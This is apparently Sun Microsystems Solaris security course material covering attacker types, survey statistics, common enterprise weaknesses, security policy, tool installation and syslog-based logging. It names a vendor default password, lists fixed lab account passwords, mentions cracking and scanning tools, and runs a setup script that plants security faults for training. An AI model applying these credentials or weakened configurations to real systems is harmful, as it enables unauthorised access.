A Denial of Service (DoS) attack is designed to stop something fromworking. It can be a type of publicity attack, or the prelude to a criminalattack. In the latter scenario, the criminal is hoping to either directlydamage your security or get you to relax your security while you sort outthe original DoS problem.

Networks are a particular target for DoS. Huge amounts of network trafficcan be generated by automating low level Transmission ControlProtocol/Internet Protocol (TCP/IP) message protocols. This becomes aDoS attack on a poorly defended network.

It is often easier for an attacker to disrupt an operation than it is for themto gain access. Attacks of this kind appeal to malicious people who revelin the sense of power that DoS attacks provide them.

UNIX provides minimal protection against many DoS attacks and theemphasis must be to prevent attackers from getting into a position wherethey can instigate a DoS attack.

Natural Causes and Environmental Influences

Accidental, non-malicious attacks are often forgotten. This categoryincludes events which are not directly caused by people, such as fire,flood, earthquake, electrical failure, and so on.

Note – Scenarios of this kind typically require a disaster recovery policy.Disaster recovery is not covered in this course.

Frequency of Security Attacks



Figure 1-2 shows where attackers are focusing their attentions. Over halfthe attacks (60 percent) involve theft of some kind, either information ormoney. If you work for a business you are probably aware of the addedthreats you face, but everyone should understand that information canhave a significant monetary value and, therefore, needs just as muchprotection as cash.

Although 60 percent of attacks were for financial gain, 40 percent weresimply malicious. Fortunately, attackers who just want to cause damageare likely to be deterred if you implement the additional securitymeasures outlined in this course.

Figure 1-2 Types of Computer Crime



Security Attacks Are Rare – Or Are They?

The U.S. Computer Security Institute (CSI) publishes an annual“Computer Crime and Security Survey.” A recent survey of 550companies and other agencies showed a worrying trend – computer crimeis definitely on the increase.

Highlights of the “2001 Computer Crime and Security Survey” include:

● 85 percent of respondents (primarily large corporations andgovernment agencies) detected computer security breaches withinthe last twelve months.

● 64 percent acknowledged financial losses due to computer breaches.

● 35 percent (186 respondents) were willing and able to quantify theirfinancial losses:

● These 186 respondents reported $377,828,700 in financial losses.

● In contrast, the losses from 249 respondents in 2000 totaled$265,589,940.



● The average annual total over the three years prior to 2000 was$120,240,180.

● As in previous years, the most serious financial losses occurredthrough theft of proprietary information (34 respondents reported$151,230,100) and financial fraud (21 respondents reported$92,935,500).

● For the fourth year in a row, more respondents (70%) cited theirInternet connection as a frequent point of attack than cited theirinternal systems (31%). The number of those citing their Internetconnections as a frequent point of attack rose from 59% in 2000 to70% in 2001.

● Thirty-six percent of respondents reported the intrusions to lawenforcement; a significant increase from 2000, when only 25%reported them. In 1996, only 16% acknowledged reporting intrusionsto law enforcement.

Respondents detected a wide range of attacks and abuses. Here are someexamples of attacks and abuses on the rise:

● Forty percent of respondents detected system penetration from theoutside. Twenty-five percent reported system penetration in 2000.

● Thirty-eight percent of respondents detected DoS attacks. Twenty-seven percent reported DoS in 2000.

● Ninty-one percent detected employee abuse of Internet accessprivileges (for example, downloading pornography or piratedsoftware, or inappropriate use of email systems). Seventy-ninepercent detected Internet abuse in 2000.

● Ninty-four percent detected computer viruses. Eighty-five percentdetected viruses in 2000.

Questions were asked about electronic commerce over the Internet. Hereare some of the results:

● Ninty-seven percent of respondents have World Wide Web (WWW)sites.

● Forty-seven percent conduct electronic commerce on their sites.

Understanding Your Attackers


● Twenty-three percent suffered unauthorized access or misuse withinthe last twelve months:

● Twenty-one percent of those acknowledging attacks reportedbetween two and five incidents.

● Fifty-eight percent reported ten or more incidents.

● Ninty percent of those attacked reported vandalism (Sixty-fourpercent in 2000).

● Twenty-seven percent said that they did not know if there had beenunauthorized access or misuse.

● Seventy-eight percent reported DoS on Web sites (Sixty percent in2000).

● Thirteen percent reported theft of transaction information (Eightpercent in 2000).

● Eight percent reported financial fraud (Three percent in 2000).


Who are the people who attack computer systems? They can be anyone;they do not even have to have access to a computer if they are intent onsabotage. Typically attackers range from organized crime syndicateslooking to instigate major fraud to bored employees looking for a bit ofexcitement (see Figure 1-3).



Figure 1-3 Perpetrators of Computer Crime



Motivations of an Attacker

Attackers apply a variety of methods, depending upon their motivation.Motivations might include:

● Destruction of data

● Theft of data

● Changing the data

● Just for fun, or the challenge

● As a springboard to other activities



Other Types of Attackers

External attackers are often thought of as being focused and highly skilledhackers, pitting their skills against the systems they are trying to infiltrate.However, such attackers take many other forms, including:

● Script Kiddies who run hacking utilities without understandingunderlying security principles

● Terrorists who damage systems to further their cause

● Criminals looking for commercial gain:

● Individuals

● Organized crime groups

● Employees with malicious or criminal intent:

● Often disgruntled

● Can be in position of trust



Hackers

Hackers have been described as follows:

“An individual who experiments with the limitations of systems forintellectual curiosity or sheer pleasure.”[Source: Bruce Schneier, Secrets and Lies (see “Additional Resources” onpage 1-3)]

“An expert at a particular program, or one who frequently does workusing it or on it; as in ‘a UNIX hacker’.”[Source: http://tuxedo.org/jargon/html/entry/hacker.html ]

“A malicious meddler who tries to discover sensitive information bypoking around.”[Source: http://tuxedo.org/jargon/html/entry/hacker.html ]

Hackers are often stereotyped as young, male, and socially on the fringe.Real hackers have considerable expertise, often more than the system’sdesigners, and they have plenty of time in which to attack systems.



Some people differentiate between hackers (the good guys) and crackers(the bad guys). Although hackers might cause little or no damage,trespass is still a crime and no hacker is ultimately a good guy. Hackersalso write hacking tools used by others who would otherwise not havethe expertise to hack your systems.

Hackers exploit weaknesses. Unless you are a particularly attractive target(usually the government or a well known company), a good securityregime will send the hacker looking for an easier target.

Script Kiddies

Script kiddies are users who obtain and use hacking tools withoutunderstanding how the tools work or how to perpetrate system attackswithout the tools.

Terrorists

Terrorists are less interested in obtaining a personal advantage than ininflicting damage upon others. Terrorists use damage to achieve theirgoals and are often ruthless. They use brute force methods, which shouldbe relatively easy to detect, and they are less interested than otherattackers in avoiding detection. Recognition is often its own reward.

Terrorists differ from other hackers, such as virus writers, because theydamage systems to further their cause and often target particularorganizations. While terrorist attacks do occur, they are unusual andgovernment agencies are the preferred target.

Criminals

Lone criminals are likely to target commercial and financial systems(because that is where the money is). They are often insiders exploiting aknown weakness, or outsiders using hacking tools. They are generallyinexperienced and often get caught. However, those that do not getcaught do cause the bulk of computer-related crime.

Organized criminal groups sometimes get involved in industrialespionage. They generally have a higher tolerance for risk than lonecriminals do and can purchase information or bribe individuals to gainaccess.



Defense against criminals is the same as defense against hackers. Makeyour system secure and they will seek easier targets.

Employees

Malicious insiders are potentially dangerous adversaries. Because anemployee, contractor, or consultant is already inside the firewalls, past theintrusion detection systems, and possibly accessing many systems, anemployee can cause a great deal of damage.

Programmers and individuals in positions of trust, such as systemadministrators, are of particular concern, because they have the expertiseto subvert systems and to cover their tracks. Protecting systems againstemployees is significantly more difficult than protecting systems againstoutsider attacks. In fact, protecting against all insider attacks might beimpossible, without causing significant inconvenience to normal business.

Top Enterprise-Wide Attacks

The following is a list of the top security weaknesses in a typicalenterprise. While it is not an exhaustive list of security vulnerabilities, youcan use this list as a guide to prioritizing your activities:

● Routers – Misconfigured access control lists on routers can allowinformation leakage through Internet Control Message Protocol(ICMP), Internet Protocol (IP), or NetBIOS, which can lead tounauthorized access to servers.

● Remote Access – Unsecured and unmonitored remote access pointsprovide easy access. Modems are particularly vulnerable. Modemuse is declining with the use of Virtual Private Networks (VPNs).

● Trusted Relationships – Excessive use of trusted relationships, suchas UNIX.rhosts and Microsoft NT Domain Trusts, can provideunauthorized access to your systems.

● User Accounts – Unnecessary privileged accounts allow morechances for attackers to gain privileged access to your systems.

● Passwords – Weak, easily guessed, and reused passwords cancompromise your systems.



● Standard Accounts – Presupplied accounts using standardpasswords (such as the Oracle system account which is installedwith a password of manager and the installer is not prompted tochange the default password).

● Software – Outdated, unpatched, or vulnerable software left on yoursystem increases the chances of accidental and malicious misuse.Failure to apply operating system patches on a regular basis is acommon cause of weak security.

● Security Policy – Lack of accepted or well-distributed securitypolicies, procedures, or guidelines.

● Sharing Data – Excessive Network File System (NFS) exports orMicrosoft NT shares.

● Unauthenticated Services – Running services such as X-Windowsthat allow keystroke captures.

● Internet Servers – Misconfigured Internet servers, particularlyCommon Gateway Interface (CGI) scripts behind Web servers andFile Transfer Protocol (FTP) servers.

● Firewalls – Misconfigured firewalls can provide access to internalsystems.

● Unnecessary Services – Remote Procedure Call (RPC), FTP, DomainName Services (DNS) and Simple Mail Transfer Protocol (SMTP),and so on can be easily compromised.

● Information Leakage – Some services, such as Simple NetworkManagement Protocol (SNMP), finger , SMTP, telnet , rusers ,rpcinfo, and NetBIOS can provide attackers with operating systemand application versions as well as users, groups, file shares, andDNS information.

● Inadequate Logging – Detection and monitoring should be done atthe host and network level.

Running an Intrusion Detection System



An Intrusion Detection System (IDS) is a type of security tool. Typically,an IDS is a network monitor which scans for suspicious behavior. It is nota substitute for good, proactive security and intruder prevention.



An IDS can alert you to a successful attack or sometimes a failed attempt.A good IDS can:

● Alert you while the attack is still taking place

● Help you track down where the attack is coming from

● Make recommendations on what action to take

Burglar Alarms and Honey Pots

Network burglar alarms and honey pots are forms of IDS. Burglar alarmsset off an alarm when events such as the following occur:

● A particular network command is used.

● A dummy network account is activated.

Honey pots are burglar alarms made to look particularly attractive toattackers. Honey pots are often dummy computers or subnets withinteresting names. Attackers are attracted to the honey pot, whichmonitors the hacking activity.



Continuous Monitoring

Security is an ongoing process. Your systems and network should bechecked for security attacks on a regular basis. Good logging and auditingprocesses are essential, but these processes are wasted if you do not checkthem regularly. Hourly checks might be excessive for most environments,but daily ones are not.

IT system vendors, third-party companies, and individuals provide manytools to help with continuous monitoring. Utilities exist that monitor logfiles for key events, recognize these events, and respond by emailing orpaging administrators so that they quickly become aware of the event.

Running Dummy Attacks

One approach to checking security levels is to run dummy attacks. Usepre-announced attacks to avoid false alarms when administrators detectthe attack. Run clandestine attacks to ensure security administrators canrespond to an attack when they are not aware that one is taking place.

Third-party companies or individuals can mount attacks to try to detectgaps in your security systems. Specialist security companies are aware ofthe latest security bulletins and weaknesses. Be sure that you trust anycompany that checks your security, because the security company thenbecomes aware of any weaknesses in your IT systems.

Sun Microsystem’s Professional Services offer a range of security auditingservices.

Vulnerability Scanners

A vulnerability scanner is an automated program that scans your networkfor known weaknesses and produces a report that you can use to help fixthem. SAINT (formerly SATAN/SANTA) is the best-known vulnerabilityscanner. See Module 12, “Analyzing Network Services” for moreinformation.

Security Policy


Security Policy

At its simplest, a security policy contains of a description of allowed andprohibited operations. This course is about tactics that increase systemsecurity. Your security policy should incorporate these tactics.

A security policy can never be static. Instead, it must continuously adaptto new knowledge and situations.

To create a security policy, you must:

● Decide what is and what is not permitted within your computingenvironment

● Define the limits of acceptable behavior relative to the security of anyenvironment

Before a security policy can be determined, answer the followingquestions:

● What am I protecting?

● Why am I protecting it?

Security Policy


● What am I protecting it from?

● How much money, manpower, and equipment can I devote toachieve adequate protection?

Proper security policy development requires a risk assessment and acost–benefit analysis.

Security Policy


Purpose and Use of a Security Policy

The security policy defines what items (buildings, people, job roles,equipment, systems, data, applications, hard copy media, and so on) andenvironments are valuable, and what steps are necessary to protect them.The security policy makes clear what is covered by the policy and why.You can also include the reasons why items are not covered. It also stateswho and what is responsible for that protection. Finally, it provides afoundation on which to resolve situations when conflicts ormisunderstandings occur.

A Security policy must be specific to the type of company and users it isapplied to. It should not be just a list of threats to the environment, but apositive statement of standards and guidelines.

The scope of a security policy can be very simple (such as a handoutcontaining guidelines) or it can include detailed manuals and regulations.Administrators, users, and company officials must have guidelinesregarding what they should and should not be doing.

Security Policy


Some topics that should be described in a security policy are:

● Password selection criteria and password aging schedules

● Ownership of systems and responsibilities

● Backup schedules and expectations of restoration of lost data

It is also important for you to decide on which of the following paradigmsto base your security policy:

● Everything not specifically denied is permitted

● Everything not specifically permitted is denied

Which paradigm you chose is likely to be based on the general level ofsecurity required at a site (with the second paradigm being more securethan the first).

Creating a Security Policy

A site security policy is usually a collection of guidelines and procedures,prefixed with a general statement of the organization's security aims.Although you can write a site security policy from scratch, you mightprefer to use the handbook written by the Network Working Group,discussed in the following section.

Site Security Handbook – Network Working Group RFC 2196,September 1997

This handbook is a guide to developing computer security policies andprocedures for sites that have systems on the Internet. This handbookprovides practical guidance to administrators trying to secure theirinformation and services. The subjects covered include:

● Policy content and formation

● A broad range of technical system and network security topics

● Security incident response procedures

This handbook is available from numerous Web sites (see “AdditionalResources” on page 1-3).

Using Third-Party Security Tools



To implement your security policy you need several tools. SunMicrosystems provides security tools and services, many of which arecovered in this course. In addition, other third-party tools administersecurity (and are sometimes used to break into systems). Established toolsand new tools are covered in security news groups, such as:

● alt.computer.security

● alt.security.*

● cern.security.unix

● comp.security.*

● misc.security

Several Web sites specialize in security, including:

● http://www.sans.com

● http://www.securityfocus.com

● http://www.cert.com



Some of Sun Microsystem’s security pages are:

● http://www.sunworld.com/sunworldonline/common/security-faq.html

● http://sunsolve.sun.com/pub/pub-cgi/sec.Bulletin.pl

Specific companies (or Open Software organizations) have developedsome of the tools. These can be found on the appropriate Web sites. Mostof the other tools are included in standard archives such as:

● ftp://ftp.cerias.purdue.edu/pub/tools/unix/

● ftp://ftp.csc.ncsu.edu/pub/security/

Several of the commonly used public domain tools have been ported tovarious versions of the Solaris OE and are available in precompiledSystem V Release 4 (SVR4) package format from the Sun Web site:

http://www.sunfreeware.com

When a specific tool is discussed during this course, a reference to theappropriate Web site is also included in “Additional Resources” onpage 1-3.

Appendix B also includes a list of security tools specific to the Solaris OE,and Appendix C has a list of third-party security tools relevant to thiscourse.

Installation of Third-Party Tools

Most tools are provided in C, C++, or Perl source code format and requirecompiling and linking for your specific platform. They are generallydistributed as tar archives and often compressed using GNU zip (gzip ).The gzip program is a standard utility provided with the Solaris 8 OE.

Note – The gzip program must be downloaded from the Sun freewaresite and installed for previous versions of the Solaris OE.

All these tools provide instructions and include shell scripts or make filesto automate the process. Look for files such as READMEor INSTALL in thetool’s top-level directory.



These tools are generally installed into a subdirectory under the/usr/local directory. Many of the tools install executable binaries intothe /usr/local directory by default (and install the manual pages intothe /usr/local/man directory).

Tool installation usually includes following these steps:

1. Download the tool archive.

2. Uncompress the archive.

3. Unpack the archive into the /usr/local directory.

4. Read the tool READMEfiles.

5. Follow the instructions in the READMEfiles. These instructions mightbe as easy as running these commands:

# make# make install

Because these tools are portable, administrators usually use the GNU C++compiler instead of the Sun Workshop Standard compiler. You shoulddownload and install the GNU C++ compiler from the Sun Free SoftwareWeb site even if you have a Sun Workshop compiler available.

Some tools might be provided as precompiled binaries for popularoperating systems (such as the Solaris OE) by the supplier or be availableon the Sun Free Software Web site. If so, install those tools using thepkgadd utility.



Security Issues With Third-Party Tools

How do you know that a third-party tool does what it is supposed to do?Can you be sure that the software posted onto the Web is as originallywritten and has not been modified by someone else?

Using MD5 Digests and Public Keys for Authentication

Many archives include Message Digest 5 (MD5) or similar signingtechniques which can validate that the software you download is thesoftware originally provided by the developer. As long as you trust thedeveloper, you can trust the software. Digital certificates and public keyscan also increase your trust in the tool developer.

As a final check, you (or an experienced programmer) can study thesource code to see what it actually does. If you are not convinced about atool’s authenticity, do not to use it.

Remove Compilers and Tools After Use

Users can use C and C++ compilers to compile and install their ownprograms. A malicious user can install hacking tools which might breachthe integrity of your system.

You should remove the compilers after you have compiled your software(they can always be reinstalled if they are required again). You can alsocompile only on one system, then transfer the final tool files to the targetsystem. This is how the Sun Freeware Web site operates. In this case, thetool is packaged as a System V package for ease of distribution andinstallation.

An alternative approach is to make the compilers executable only by theroot user. However, this does not protect you from a user successfullyhacking your root account and using the compiler to leave a trapdoor forfuture use.

Similarly, the tools that you use to check system security can also be usedby malicious users to look for security weaknesses. Many tools must beused continuously, but some are used once and rarely again. Remove toolsafter they have served their purpose, and make sure that the tools are notexecutable by ordinary users at any time.

Site Policy for Security Tools



The tools used in this course provide a good suite of securityenhancement products. They can also attack a system. Many sites havestrict rules about the use and installation of these tools. The followingexamples are real instances of rules or guidelines imposed by some sites:

● Installing password guessing tools (like crack ) can result inimmediate dismissal.

● Using the SAINT (SATAN/SARA) scanning program on a dial-upline results in the ISP disabling your account for one month with anadministration charge for re-enabling it.

● Using network sniffing tools (even official ones like snoop ) can resultin immediate dismissal.



Warning – Do not use any of the tools described in this course withoutthe permission of the system and network administrators at your location.Do not even download or install the tools without first obtaining theauthority to do so.

Exercise: Considering Security Issues



In this exercise, you complete the following tasks:

● Discuss example security attacks

● Discuss your site’s security policy, if you are permitted to do so

● Install software to use throughout this course

Task – Example Security Attacks

Think of an example of security attacks for each of the categoriesdiscussed in “Types of Security Attacks” on page 1-21:

● Fraud

● Theft

● Terrorism and sabotage

● Privacy violation

● Publicity attacks

● Denial of service

● Natural causes and environmental influences

Task – Security Policy

Does your site have a security policy? Have you seen it? What sort ofsecurity issues does it discuss? Give an example of a security policy orprocedure related to your job role.



Task – System Configuration

This task must be completed to configure your workstation for theremainder of the course.

To complete this task, you must install the GNU C++, make utility, tools,and sample data files used for the rest of this course.

The software tools used for this course are usually downloaded from aWeb site. To avoid long download times on slow or overloaded networksall the necessary software is already available on the instructor’s system.

Most of the tasks you perform are done with root privileges. This givesyou unrestricted access to the system and the potential to causeirrevocable harm to the Solaris OE. If at any time you are unsure what todo, ask your instructor for assistance.

Note – The instructor provides the host name or IP address and a useraccount and password for use with the ftp command.

Perform the following steps in the order given:

1. Log in as root and start a shell window if you are using theCommon Desktop Environment (CDE).

2. Create a directory for the course software. Download and unzip therequired files from the instructor’s workstation using the followingcommands:

1 # mkdir -p /usr/local/pkg2 # cd /usr/local/pkg3 # ftp instructor system4 ftp> bin5 ftp> cd /usr/local/pkg6 ftp> prompt7 ftp> mget *8 ftp> bye9 # gunzip *.gz



3. Although Solaris 8 OE comes with a standard Perl 5 interpreter, thisis not compatible with many of the third-party tools written in Perl(swatch for example). The standard Perl interpreter is designed towork with the Sun Workshop C/C++ compilers whereas most of thetools you will use are compiled with the GNU C/C++ compiler. Youmust load a later version of Perl which supports the GNU C/C++compiler and use it in preference to the perl command in the/usr/bin directory.

4. Install the Perl 5.6 compiler in the /usr/local/pkg directory.

5. Install the GNU C++ compiler and make utility. This software is inthe /usr/local/pkg directory.

# pkgadd -d perl-5.6.0-sol8-sparc-local

6. Add the gcc and make packages to the system using the followingcommands:

# pkgadd -d gcc-3.0.3-sol8-sparc-local# pkgadd -d make-3.79.1-sol8-sparc-local

7. Create a symbolic link for the GNU C++ compiler that has just beeninstalled:

# cd /usr/local/bin# ln gcc cc

8. Configure the standard login profile to include the necessary binaryfiles and manual pages. Modify the /etc/profile file and add thefollowing lines at the end of the profile (before the final trapcommand):

1 EDITOR=vi2 VISUAL=vi3 export EDITOR VISUAL45 PATH=/usr/local/bin:/usr/local/sbin:$PATH:/usr/ccs/bin6 MANPATH=/usr/share/man:/usr/local/man7 export MANPATH89 LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib:/usr/local/ssl/lib:/usr/ccs/lib10 export LD_LIBRARY_PATH



Note – In this example, /usr/local/bin and /usr/ccs/bin directorieshave been added to the standard path. These directories must now havethe same security checks and controls applied as the standard system bindirectories.

9. If your root account has presupplied login environment files,remove these files:

# rm /.profile /.kshrc

You can customize the Korn shell environment for root if you want.

Warning – It is imperative that the root account has a search path whichuses the versions of perl , make, and cc which have been installed in the/usr/local/bin directory. The configuration shown in this exerciseensures that this is true. Solaris OE has versions of cc in /usr/ucb/binand /usr/ccs/bin , perl in /usr/bin and make in /usr/ccs/bin . If youuse these programs instead of the ones in /usr/local/bin , then some ofthe downloaded tools (swatch in particular) do not build or run correctly.

10. To simplify tool installation, a shell script called undos is included inthe /usr/local/pkg directory. This script uses the unix2doscommand to convert one or more plain text files to UNIX format(recursing through directories if required). Copy this script to the/usr/local/bin directory using:

# cp /usr/local/pkg/undos /usr/local/bin

11. Run the script:

# /usr/local/pkg/sc300_setup



This script creates users, creates some security faults, and installssample log files on your system. When the script runs, you areprompted to set passwords for three user accounts. Table 1-1 showsyou which passwords to enter.

Table 1-1 Sample Users and Passwords

User Name Password

alice w0nderland (Note use of digit zero)

bob b0bb0b (Note use of digit zero)

eve 3v3adam

Exercise Summary


Exercise Summary

?!

Discussion – Take a few minutes to discuss what experiences, issues, ordiscoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following are solutions to the exercises. If you have any questionsabout either the exercises or the given solutions, talk with your instructor.

Example Security Attacks

The following list includes one example of each type of security attack;there are many others.

a. Fraud – Falsifying payroll details to get a higher salary or falseexpense reimbursement

b. Theft – Buying goods with a false credit card number

c. Terrorism and sabotage – Installing a time bomb into a system

d. Privacy violation – Stealing someone’s credit card details

e. Denial of service – Overloading a DNS server with false requests

f. Publicity attacks – Telling the press about a fault on a site which youhave discovered or created

g. Natural causes and environmental influences – A floodedmachine room

Security Policy

There are no solutions to this exercise.

System Configuration



Module 2

Using Solaris™ OE Log Files

Objectives


● Locate and interpret Solaris™ OE standard log files

● Use log files to form an audit trail

● Configure and use the syslogd daemon

● Configure and use the Solaris OE process monitoring control tools

● Use third-party process monitoring tools

● Configure and use UNIX accounting tools

Relevance


Relevance

?!

Discussion – The following questions are relevant to understanding therole of logging into a secure Solaris OE:

● How easy is it to track what Solaris OE users are doing or have done?

● What is an audit trail?

● What are the vulnerabilities of an audit system?

Can you:

● Configure the Syslog facility to log system errors or debug messagesand notices?

● Configure a centralized logging host?


Using Solaris™ OE Log Files 2-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Solaris OE manual pages for acctcom(1M) , accton(1M) ,ckpacct(1M) , dodisk(1M) , finger(1) , kill(1) , last(1) ,lastcomm(1M) , lastlog(3) , lastlogin(1M) , logger(1M) ,login(1) , monacct(1M) , pacct(3) , prdaily(1M) , runacct(1M) ,sar(1M) , shutacct(1M) , su(1) , syslogd(1M) , syslog.conf(3) ,users(1) , utmpx(3) , vmstat(1) , wtmpx(3) , who(1) , whodo(1) , andw(1) .

● Garfinkel, Simson, and Gene Spafford. Practical UNIX & InternetSecurity. O’Reilly & Associates, Inc. 1996.

● Frisch, Aeleen. System Administration. 2nd Ed, O’Reilly &Associates, Inc. 1995.

● Winsor, Janice. Solaris™ System Administrator's Guide. 3rd Ed,Prentice Hall. 2000.

● Gregory, Peter H. Solaris Security. Prentice Hall. 1999.

Tool Downloads

● swatch online resources,[ftp://ftp.stanford.edu/general/security-tools/swatch/ ]

● top ported to Solaris OE 2.x,[http://www.sunfreeware.com ]

● top online resources[http://www.groupsys.com/top ]

Solaris OE Logging Files



As a Solaris OE system administrator, you monitor the standard log filesand use programs to provide snapshots of system activity.

Before you look at individual log files, the following hints might help youmanage log files:

● Back up or copy log files on a regular, preferably daily, basis.

● Reset the size of log files to zero after a backup to prevent log filesfrom becoming unmanageable and to reduce the risk of running outof disk space.

● Review the log files regularly. Logging is pointless if nobody readsthe logs.

● Use filters to manage the amount of data to review. However,periodically review the entire log to ensure that nothing important isbeing missed.

● Send log files to a separate, secure log host, by either copying the logfiles or sending the log messages to one or more designated hosts onthe network. Additional information on configuring separate loghosts is provided in “Why Use Centralized Logging?” on page 2-13.

Most log files are text files that system programs write to. The followingsections cover a few log files that you might find useful.



Using /var/adm/lastlog Files

The Solaris OE records each time a user logs in to the system, using/var/adm/lastlog files. The next time the user logs in, the time of theprior login is reported on the screen. Train users to check this informationeach time that they use the system and to report any discrepancy withtheir known prior login time.

Note – The /var/adm/lastlog file is not a text file and cannot bebrowsed using standard utilities. Displaying the last login information is afunction of the Solaris OE accounting package covered in “The Solaris OEAccounting Package” on page 2-27.



A successful login erases all previous information. Therefore, if a usermisses a suspicious login attempt when logging in, the information is lost.One way to prevent losing this information is to add an entry to root ’scrontab file to copy the lastlog on a regular basis to another securelocation.

Note – No utility exists in Solaris OE to read the contents of the/var/adm/lastlog file. A script that reads a lastlog file and prints outthe information is available from the O’Reilly Web site at:ftp://ftp.ora.com/pub/examples/nutshell/prac_unix_internet_secur/ .

Using /var/adm/loginlog Files

The loginlog file records unsuccessful login attempts, but only after fiveconsecutive failures. This file is useful only to track repeated loginattempts – most hackers have more subtle ways of attacking your system.

Note – The /var/adm/loginlog file is not created when installing theSolaris OE and you must create it before login failures can be recorded.This file does not record login failures from the CDE dtlogin program.

Using utmpx and wtmpx Log Files

The utmpx and wtmpx files store information about who is currentlylogged in to the system.

The /var/adm/utmpx file replaces the old /etc/utmp file. It providesinformation similar to the lastlog file, but stores information only onusers currently logged into the system.

The /var/adm/wtmpx file stores information every time users log in andwhen they log out. It extends the information stored in the /etc/wtmp fileby recording the type of connection and the remote host name for loginsover the network.



The Solaris OE programs that report on users currently logged in (forexample who, whodo, w, users , and finger ) obtain their information fromthe utmpx file. The last program reads the wtmpx file to create a report ofthe most recent user logins.

Note – When a user uses the su command to become another user andchanges the real and effective user ID (UID), their entry in the utmpx fileis not altered. This can confuse programs that obtain a user’s identityfrom the utmpx file.

Using the sulog File

The sulog file is specific to the su program. It records all attempts thatusers makes to change their identity to that of another user. You candefine parameters in the file /etc/default/su to specify the location ofthe sulog file and to specify whether attempts to use the su command tochange to root are logged on the console (this is the default setting).

You should monitor the sulog file to see whether users are attempting touse the su command to change to root . However, after successfullyhacking into the root account, a hacker is likely to edit or remove thesulog file. One way to prevent possible loss of the sulog file is to sendeach entry logged to the sulog file to a printer to create a hardcopy or tosend each entry to a remote logging daemon across the network.

Using /var/adm/messages Files

In the Solaris OE default configuration, all messages sent to the consoleare also stored in the /var/adm/messages file. This provides a morepermanent record for messages that might otherwise be lost.

The System Logging Facility



The System Logging Facility (Syslog) is a host-configurable, uniformsystem logging facility. Before Syslog was developed, each utility thatrequired logging created and managed its own individual log files. Duringthe development of Berkeley UNIX, the system logging facility daemon,syslogd , was developed to simplify and centralize the maintenance andevaluation of logged data. The Syslog utility uses a set of standard libraryfunctions to pass status messages and other logged information to thesyslogd process.



Configuring the Syslog Utility

One advantage of the Syslog utility is that application programmers canuse Syslog to send notification messages without creating log files. Eachmessage consists of four parts:

● Program name – A short text name for the program, such as make orgcc (usually the name of an executable program).

● Facility – A category of program generating the message.

● Priority – Defines the priority level for the message.

● Message text – The message itself.



The facility defines the type of program generating the message, as shownin Table 2-1.

Priorities range from debug to emerg (emergency), as shown in Table 2-2.A special priority of none in the configuration file indicates that themessage should be ignored. Specifying a low priority level automaticallyincludes the higher levels for the same facility.

Note – These priorities are only labels. One programmer’s emergencymight be another’s warning.

Table 2-1 Syslog Facility Values

Program Type Description

kern Kernel

user User process

mark Time stamp

auth Authorization programs (for example, login ,su , getty )

daemon Network daemons (for example, inetd , ftpd )

* All facilities

Table 2-2 Syslog Priority Levels, in Descending Order

Priority Description

emerg For panic conditions normally broadcast to all users

alert For conditions that need immediate correction

crit For critical condition warnings

err For other errors

warning For warning messages

notice For non-error conditions that might require action

info Informational messages

debug Used when debugging daemons and so on

none Blocks messages from the named facility



The configuration file, /etc/syslog.conf, controls where messages arelogged. Each line of the configuration file consists of a selector, whichspecifies which message to log, and an action field that specifies what todo with the message.

● The selector has the format: facility.priority .

● The action field causes Syslog to do one of the following:

● Append the messages, with a time stamp, to a specified log fileor device. The log file or device name must be a fully qualifiedpath name starting with a forward slash.

● Forward the messages to users using the write utility. If theuser is not logged in, the message is lost. You can separatemultiple user names with commas. An asterisk indicates thatthe message should be written to all logged-in users.

● Forward the messages to the syslogd daemon of anothernetwork host. The host is specified after the “@” symbol (forexample, @netlog.sun.com ).



An example/etc/syslog.conf file is shown in Code 2-1.

Code 2-1 Example /etc/syslog.conf Configuration File

1 *.err;kern.*;mark.*;auth.notice/dev/console2 daemon.*;auth.notice /var/adm/messages3 auth.warn root4 auth.warn /dev/lp05 *.emerg *

Note – The white space between the selector field and the action fieldmust be one or more tab characters. Using spaces instead of tabs causesthe Syslog utility to ignore the action.

You must turn on Syslog logging in some programs:

● Set SYSLOG=YESin the /etc/default/login file to log all rootlogins (such as auth.notice ) and multiple failed login attempts(such as auth.crit) .

● Set SYSLOG_FAILED_LOGINS=0in the /etc/default/login file tolog all failed login attempts. The default only logs after five failedattempts.

● Set SYSLOG=YESin the /etc/default/su file to log all attempts touse the su command to change to the root user. Every such use islogged at syslog level auth.info , and all failed su commandattempts are logged at syslog level auth.crit .

Caution – Anyone can use the Syslog utility to generate log entries. Beaware that false information might be written to your log files.



Why Use Centralized Logging?

The default /etc/syslog.conf file keeps all messages on the local host.This might be adequate in a small environment, but managing numerouslog files from multiple hosts can become difficult on a large network. Youcan configure the syslogd daemon to automatically send log data to acentral syslogd server. Advantages of centralized logging include:

● Complex problems involving multiple systems can be easier totroubleshoot because all the error information is on one serverinstead of several servers.

● One log server is easier if your site requires rotation and tape backupof the system logs.

● Centralized, real-time, log monitoring allows proactive problemsolving rather than reactive “fire fighting.”

● Hackers that successfully break-in to one system cannot edit the logfiles to hide their success unless they break-in to the logging host aswell.



When configuring a central log host, consider the following issues:

● The data is usually sent in plain text, which allows an attacker withaccess to the network to use network sniffing tools that view andidentify data as it is transferred.

● One centralized log server is a single point of failure in the system.Therefore, it is a good idea to log events from all systems on multiplelog servers.

● Multiple centralized log servers make it more difficult for hackers tohide their tracks but also adds complexity to the logging system.

Configuring and Debugging Logging to Remote Hosts

You can have all your systems send the messages to one central host. Eventhough this method is easy to administer, it creates a single point offailure. The syntax for the /etc/syslog.conf file allows a logging host tobe specified, as follows:

auth.notice @loghost

If multiple logging hosts are required, then multiple lines must beprovided:

auth.notice @loghost1auth.notice @loghost2

This solution adds to overall security. Even if someone breaks into onesystem and erases its log files, you still have another copy.

The code for the syslogd daemon can be compiled on a non-UNIX hostthat has standard C and TCP/IP libraries. If you log in to a PC withSyslog as its only network service, there is no way for someone to break-in from the Internet and alter the logs.



The logger Utility

A system administrator can use the logger utility to send entries to thesyslogd daemon from the command line. For example, you might use thelogger utility to record suspected intrusions when your suspicions areprovoked.

You can change the facility and priority of the message from the defaultuser.notice setting by using the -p option. Refer to the Solaris OEmanual page for the full list of options (see “Additional Resources” onpage 2-3).

The following example logs the message “System rebooted” to the systemlog at the default priority level user.notice :

# logger "System rebooted"

